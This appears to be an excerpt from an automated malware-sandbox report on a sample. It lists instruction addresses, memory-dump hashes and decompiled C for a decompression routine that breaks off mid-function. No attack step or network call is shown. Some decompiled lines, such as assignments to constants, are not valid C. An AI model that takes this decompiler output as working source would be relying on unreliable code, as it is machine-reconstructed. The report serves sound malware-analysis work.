                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00406dc8
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x00000000
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407137
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x00000000
                            0x004073c8
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00000000
                            0x0040753b
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x00000000
                            0x00407390
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
